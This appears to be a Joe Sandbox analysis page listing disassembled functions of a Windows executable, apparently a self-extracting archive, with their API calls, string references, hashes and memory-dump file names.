Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 580924a33c4e8d4c14a2bd8578192ffe5b89fe7f00d81fd6b2dc59636ee68eab
Instruction ID: 1540371cc8685d601a75043680181ea655f91b5d5fb441ac0796bd9d1205d7f9
Opcode Fuzzy Hash: 580924a33c4e8d4c14a2bd8578192ffe5b89fe7f00d81fd6b2dc59636ee68eab
Instruction Fuzzy Hash: 7951E5315093D98EC701DF38C9405AEBFF0AE9A714F1909ADE4D95B243C229DA4ACB52

Function 007C00B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a11374e4d57c7b433dcf9790e318c4a5237c7b96c97d41a2b378ea4cd75b616
Instruction ID: 8b32c9036532b95acfebcbf0f103f5ee657460bfbe32a14dd7e3c47bea55c331
Opcode Fuzzy Hash: 8a11374e4d57c7b433dcf9790e318c4a5237c7b96c97d41a2b378ea4cd75b616
Instruction Fuzzy Hash: 8D51F0B1A083159FC748CF19D48065AF7E1FF88314F058A2EE899E3301D734E959CB96

Function 007C3E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: d30b5c5a95dd5ff6b0299528b697b3861bf8b1e068f4f77b8229b9b2768804b1
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 9F3107B1A147469FCB15EF28C8557AABBE0FB95304F10892DE485C7741C73DEA0ACB91

Function 007BE2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 007BE30E

Part of subcall function 007B4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007B40A5

Part of subcall function 007C1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,007F1030,00000200,007BD928,00000000,?,00000050,007F1030), ref: 007C1DC4

_strlen.LIBCMT ref: 007BE32F
SetDlgItemTextW.USER32(?,007EE274,?), ref: 007BE38F
GetWindowRect.USER32(?,?), ref: 007BE3C9
GetClientRect.USER32(?,?), ref: 007BE3D5
GetWindowLongW.USER32(?,000000F0), ref: 007BE475
GetWindowRect.USER32(?,?), ref: 007BE4A2
SetWindowTextW.USER32(?,?), ref: 007BE4DB
GetSystemMetrics.USER32(00000008), ref: 007BE4E3
GetWindow.USER32(?,00000005), ref: 007BE4EE
GetWindowRect.USER32(00000000,?), ref: 007BE51B
GetWindow.USER32(00000000,00000002), ref: 007BE58D

Strings

$%s:, xrefs: 007BE302
CAPTION, xrefs: 007BE4BD
d, xrefs: 007BE3F5
t~, xrefs: 007BE34A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$t~
API String ID: 2407758923-2041922260
Opcode ID: 649abd2a9a07aef05756bce0ab02805674b3cf5d218f1b1a4a3e42dc3f643325
Instruction ID: 14ceebb1ad7c9aea6fee5d2da78203dd693778a281d6851964042ddb536a483d
Opcode Fuzzy Hash: 649abd2a9a07aef05756bce0ab02805674b3cf5d218f1b1a4a3e42dc3f643325
Instruction Fuzzy Hash: 5E819071208341AFD710DF68CC89BABBBE9FF89714F04492DFA8597250D738E9058B52

Function 007DCB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 007DCB66

Part of subcall function 007DC701: _free.LIBCMT ref: 007DC71E
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC730
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC742
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC754
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC766
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC778
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC78A
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC79C
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC7AE
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC7C0
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC7D2
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC7E4
Part of subcall function 007DC701: _free.LIBCMT ref: 007DC7F6

_free.LIBCMT ref: 007DCB5B

Part of subcall function 007D8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007DC896,007E3A34,00000000,007E3A34,00000000,?,007DC8BD,007E3A34,00000007,007E3A34,?,007DCCBA,007E3A34), ref: 007D8DE2
Part of subcall function 007D8DCC: GetLastError.KERNEL32(007E3A34,?,007DC896,007E3A34,00000000,007E3A34,00000000,?,007DC8BD,007E3A34,00000007,007E3A34,?,007DCCBA,007E3A34,007E3A34), ref: 007D8DF4

_free.LIBCMT ref: 007DCB7D
_free.LIBCMT ref: 007DCB92
_free.LIBCMT ref: 007DCB9D
_free.LIBCMT ref: 007DCBBF
_free.LIBCMT ref: 007DCBD2
_free.LIBCMT ref: 007DCBE0
_free.LIBCMT ref: 007DCBEB
_free.LIBCMT ref: 007DCC23
_free.LIBCMT ref: 007DCC2A
_free.LIBCMT ref: 007DCC47
_free.LIBCMT ref: 007DCC5F

Strings

h~, xrefs: 007DCC0E

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: h~
API String ID: 161543041-3383275292
Opcode ID: b4f049199ec7f33d57140d74ef24e42a1a3bf50eb07ea0d010aaead39b5d1871
Instruction ID: 77c9b8f64c54c59f91ffcc11233c293e8bc83e4c30198ef76c1fc4c298a82927
Opcode Fuzzy Hash: b4f049199ec7f33d57140d74ef24e42a1a3bf50eb07ea0d010aaead39b5d1871
Instruction Fuzzy Hash: 5F314F71600206EFEB22AA39D94AB5677FAAF58310F14442BE148D7392DF79EC40CB61

Function 007D96F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007D9705

Part of subcall function 007D8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007DC896,007E3A34,00000000,007E3A34,00000000,?,007DC8BD,007E3A34,00000007,007E3A34,?,007DCCBA,007E3A34), ref: 007D8DE2
Part of subcall function 007D8DCC: GetLastError.KERNEL32(007E3A34,?,007DC896,007E3A34,00000000,007E3A34,00000000,?,007DC8BD,007E3A34,00000007,007E3A34,?,007DCCBA,007E3A34,007E3A34), ref: 007D8DF4

_free.LIBCMT ref: 007D9711
_free.LIBCMT ref: 007D971C
_free.LIBCMT ref: 007D9727
_free.LIBCMT ref: 007D9732
_free.LIBCMT ref: 007D973D
_free.LIBCMT ref: 007D9748
_free.LIBCMT ref: 007D9753
_free.LIBCMT ref: 007D975E
_free.LIBCMT ref: 007D976C

Strings

0d~, xrefs: 007D96FC

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 0d~
API String ID: 776569668-1829162522
Opcode ID: 8d5c6a6e66bc4662c683e7f593887590bc2e82c69751da5e1c1a82b634951717
Instruction ID: a6662759fa824470202c64d8e8cc8cf880554a72938729d9131d4e1a3632bd3d
Opcode Fuzzy Hash: 8d5c6a6e66bc4662c683e7f593887590bc2e82c69751da5e1c1a82b634951717
Instruction Fuzzy Hash: 7E11A476210109FFCB41EF54C946CD93BB6EF5C350B5154A2FA088F2A2DE36EA509B85

Function 007C9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007C9736
_wcslen.LIBCMT ref: 007C97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 007C97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 007C9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007C982D

Strings

utf-8"></head>, xrefs: 007C976B
</html>, xrefs: 007C97B7
<html>, xrefs: 007C9755, 007C978E
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 007C9760

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 379b4eba50a01aed811420e5a4269c7c4bec9cded047a67c56f70d3abdc5130d
Instruction ID: 60ce18ba026339060c608c893892dc3dae29fb9a8e354f24827f67656c846b87
Opcode Fuzzy Hash: 379b4eba50a01aed811420e5a4269c7c4bec9cded047a67c56f70d3abdc5130d
Instruction Fuzzy Hash: 8B314832509741BBE725AF209C4EF6B77ACAF46720F14011EF601972D2EB6CDA0483A6

Function 007CD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 007CD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 007CD6ED

Part of subcall function 007C1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007BC116,00000000,.exe,?,?,00000800,?,?,?,007C8E3C), ref: 007C1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 007CD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 007CD720
GetObjectW.GDI32(00000000,00000018,?), ref: 007CD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 007CD75D
DeleteObject.GDI32(00000000), ref: 007CD764
GetWindow.USER32(00000000,00000002), ref: 007CD76D

Strings

STATIC, xrefs: 007CD6F3

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: ee07e67a9d8fd17d1418276fd87bcb2dec5ffce0a914b1a916511fc53396b454
Instruction ID: 425e4eb4fca8efa20eea2cba265be70e9ba20a4f48c5f20acb906ddcbc48aa7a
Opcode Fuzzy Hash: ee07e67a9d8fd17d1418276fd87bcb2dec5ffce0a914b1a916511fc53396b454
Instruction Fuzzy Hash: 5A11D272141710BBE6316BB09C4EFEF779CAF48751F00813CFA41A2092DA78CE0646A5

Function 007D2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 007D2F50
___TypeMatch.LIBVCRUNTIME ref: 007D305E
_UnwindNestedFrames.LIBCMT ref: 007D31B0
CallUnexpected.LIBVCRUNTIME ref: 007D31CB
_abort.LIBCMT ref: 007D31D0

Strings

csm, xrefs: 007D2F87
csm, xrefs: 007D2E6E
csm, xrefs: 007D2EDB

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 08bfeab51cec5ac49361170154fc68e15b3195115eea13bb5f33c9ca79573ec1
Instruction ID: c4d50900684f590bc088a9cacb8e65038b213dc378a523547d920a412c416c63
Opcode Fuzzy Hash: 08bfeab51cec5ac49361170154fc68e15b3195115eea13bb5f33c9ca79573ec1
Instruction Fuzzy Hash: 02B1697190020AEFCF25DFA4C9859AEBBB6FF54310F14455BE8016B312D739DA52CBA2

Function 007BAF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007BAF29

Strings

ROOT\CIMV2, xrefs: 007BAF5C
n|, xrefs: 007BAFC0
Name, xrefs: 007BB0B0
Windows 10, xrefs: 007BB0C2
WQL, xrefs: 007BAFDC
SELECT * FROM Win32_OperatingSystem, xrefs: 007BAFCA

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n|
API String ID: 3519838083-2852546789
Opcode ID: 21a9c5265fe9df756733fd6cdf123eea6375e5d4685ad1e7d98104e7a90c2710
Instruction ID: a1d1edc7acbd5b194d6a9e93d86c98549d3c2087477edf61f4dbf6761ae0dd31
Opcode Fuzzy Hash: 21a9c5265fe9df756733fd6cdf123eea6375e5d4685ad1e7d98104e7a90c2710
Instruction Fuzzy Hash: 39715D70A01259EFDB14EFA5CC99ABEB7B9FF48310B14415DF512A72A0CB78AD01CB60

Function 007B6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B6FAA
_wcslen.LIBCMT ref: 007B7013
_wcslen.LIBCMT ref: 007B7084

Part of subcall function 007B7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 007B7AAB
Part of subcall function 007B7A9C: GetLastError.KERNEL32 ref: 007B7AF1
Part of subcall function 007B7A9C: CloseHandle.KERNEL32(?), ref: 007B7B00

Strings

SeRestorePrivilege, xrefs: 007B6FC2
SeCreateSymbolicLinkPrivilege, xrefs: 007B6FCC
\??\, xrefs: 007B702B
UNC\, xrefs: 007B7051

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 05047a646554b8cd2f00401ce45b5fe3ee6e3fd6846dec764c4d5c8d39e8aa83
Instruction ID: 980650e9e9c406c1b38b6f38cdfdcd11e5ce41280c9ec3ca5ff34e5d78f0f4c6
Opcode Fuzzy Hash: 05047a646554b8cd2f00401ce45b5fe3ee6e3fd6846dec764c4d5c8d39e8aa83
Instruction Fuzzy Hash: E541FBB1D08388FAEB24E7749C8AFEE776C9F84304F404456FA45A7182D67CAA44C771

Function 007CB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007B1316: GetDlgItem.USER32(00000000,00003021), ref: 007B135A
Part of subcall function 007B1316: SetWindowTextW.USER32(00000000,007E35F4), ref: 007B1370

EndDialog.USER32(?,00000001), ref: 007CB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 007CB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 007CB650
SetWindowTextW.USER32(?,?), ref: 007CB661
GetDlgItem.USER32(?,00000065), ref: 007CB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 007CB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 007CB694

Strings

LICENSEDLG, xrefs: 007CB5D4

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: f4600ed2084ba72d889ce8ab5ad4607339a63735c29c28158982fca0f4f6ed7d
Instruction ID: 1ecb2cd44c074214d5f5d0931a90d58c112c6fad781a693db2e528a2334baab0
Opcode Fuzzy Hash: f4600ed2084ba72d889ce8ab5ad4607339a63735c29c28158982fca0f4f6ed7d
Instruction Fuzzy Hash: 6021A132204215BBE6219F76ED4FF7B3BBDFB4AB41F01801CF601A65A1CB6A9901D635

Function 007CFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,7EB1FED3,00000001,00000000,00000000,?,?,007BAF6C,ROOT\CIMV2), ref: 007CFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,007BAF6C,ROOT\CIMV2), ref: 007CFE14
SysAllocString.OLEAUT32(00000000), ref: 007CFE1F
_com_issue_error.COMSUPP ref: 007CFE48
_com_issue_error.COMSUPP ref: 007CFE52
GetLastError.KERNEL32(80070057,7EB1FED3,00000001,00000000,00000000,?,?,007BAF6C,ROOT\CIMV2), ref: 007CFE57
_com_issue_error.COMSUPP ref: 007CFE6A
GetLastError.KERNEL32(00000000,?,?,007BAF6C,ROOT\CIMV2), ref: 007CFE80
_com_issue_error.COMSUPP ref: 007CFE93

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 05a7522333b3fa77c79c0448b8462be0d3ff2b8443c778184b71a26242c2d584
Instruction ID: 1a10406b9c386a8e0cb187148967abc25d7aca8401c874fd307136e466a081a7
Opcode Fuzzy Hash: 05a7522333b3fa77c79c0448b8462be0d3ff2b8443c778184b71a26242c2d584
Instruction Fuzzy Hash: 5541EB71A00259EBD7109F65CC49FAEBBBAEB48710F14427EF905E7291D73C990087A5

Function 007B9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 007B93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 007B93C9

Part of subcall function 007BC29A: _wcslen.LIBCMT ref: 007BC2A2

Part of subcall function 007C1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007BC116,00000000,.exe,?,?,00000800,?,?,?,007C8E3C), ref: 007C1FD1

_swprintf.LIBCMT ref: 007B9465

Part of subcall function 007B4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007B40A5

MoveFileW.KERNEL32(?,?), ref: 007B94D4
MoveFileW.KERNEL32(?,?), ref: 007B9514

Strings

rtmp%d, xrefs: 007B944E

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: c0a6099f544fa2375be7c27b3641b6976ab643e40bb6e938781dd6352f3136c7
Instruction ID: 9aee33fcf5911beedd1ac0c3cb929a95dc1397384d5c7c592ea9ae9c0473ac92
Opcode Fuzzy Hash: c0a6099f544fa2375be7c27b3641b6976ab643e40bb6e938781dd6352f3136c7
Instruction Fuzzy Hash: 504164B1941254A6DF31EB60CD49FEE737CAF45340F1088A9B759E3152EB7C8B898B60

Function 007B1100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007B112B
_wcslen.LIBCMT ref: 007B1153
_wcslen.LIBCMT ref: 007B1182
_wcslen.LIBCMT ref: 007B11A9

Strings

U|, xrefs: 007B120D, 007B123B
p|, xrefs: 007B1205, 007B1233
z|, xrefs: 007B1219

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
